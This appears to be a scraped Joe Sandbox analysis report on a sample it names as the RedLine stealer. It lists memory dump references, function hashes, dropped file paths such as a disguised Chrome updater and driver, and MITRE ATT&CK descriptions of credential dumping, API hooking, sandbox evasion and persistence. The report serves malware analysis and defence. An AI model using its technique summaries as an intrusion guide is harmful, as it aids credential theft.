Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type
String ID:
API String ID: 3338496922-0
Opcode ID: 4eb5dbd8200f1334edd45560cea2ae782af245793979326ea6ff26b84c3899ae
Instruction ID: 23c97f2abcf43d100901376929b7a8e4a6c20b98e876ce252dec84b4a3cfb81f
Opcode Fuzzy Hash: 4eb5dbd8200f1334edd45560cea2ae782af245793979326ea6ff26b84c3899ae
Instruction Fuzzy Hash: B021A270520242CBC311FF14D4657EA3BE1FB51384F948E6DD8044A25AD77AC8EAEB91

Uniqueness

Uniqueness Score: -1.00%

Function 004BE340 Relevance: 5.2, APIs: 4, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fba42e1e2b227a38aa5c8bb3993745a3ad6aeea6f31688776b143b3d67c6a1b5
Instruction ID: 8b644b7cf9e71b14234089398b129a77536404c2d9eb448fa2acfe39220be7c1
Opcode Fuzzy Hash: fba42e1e2b227a38aa5c8bb3993745a3ad6aeea6f31688776b143b3d67c6a1b5
Instruction Fuzzy Hash: 3A7183B15083109FC720AF66C0805ABFBF4EFD5751F51892FE9848B311E7799845CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 003FD330 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?,00405E8B), ref: 003FD366
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000000,?,00405E8B), ref: 003FD390

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 9c136b0c3fd56e6fe0c7f83d4873e8fa6a27e6a276892347e530f6549b498f55
Instruction ID: 38614203374d8e547515f0d65b4c48dd53b66b9e5f21b7d1e14230d2fe26c550
Opcode Fuzzy Hash: 9c136b0c3fd56e6fe0c7f83d4873e8fa6a27e6a276892347e530f6549b498f55
Instruction Fuzzy Hash: 7C3102B15043048FDB05EF29E8C866AB7E1FF44314F19866AED058F349E731E989DB92

Uniqueness

Uniqueness Score: -1.00%

Function 003FD040 Relevance: 5.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,003FD635), ref: 003FD060
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,003FD635), ref: 003FD07C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,003FD635), ref: 003FD0B9
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,003FD635), ref: 003FD0C5

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 4ed44f3984c50c1c71401d072501c86807ef11329fa76e195322d35735a4a933
Instruction ID: 8fd20116d7e0243e81bb9aaf2db5f4024b1ffbe4148ebe84ff614505a3621ee8
Opcode Fuzzy Hash: 4ed44f3984c50c1c71401d072501c86807ef11329fa76e195322d35735a4a933
Instruction Fuzzy Hash: D1110AB5A083158FC701EF39E98551EFBF0EF99651F01492EEA8887311E631E849CB93

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hZDPlQwZ9D.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

C:\Program Files\Google\Libs\WR64.sys

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_hZDPlQwZ9D.exe_4741bc54b03277606fc2b7fc259d1f376f4a1b4_a38f395c_057b1ceb\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER122D.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1461.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER14EF.tmp.xml

C:\Users\user\AppData\Local\Google\brave.exe

C:\Users\user\AppData\Local\Google\chrome.exe

Windows Analysis Report
hZDPlQwZ9D.exe

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre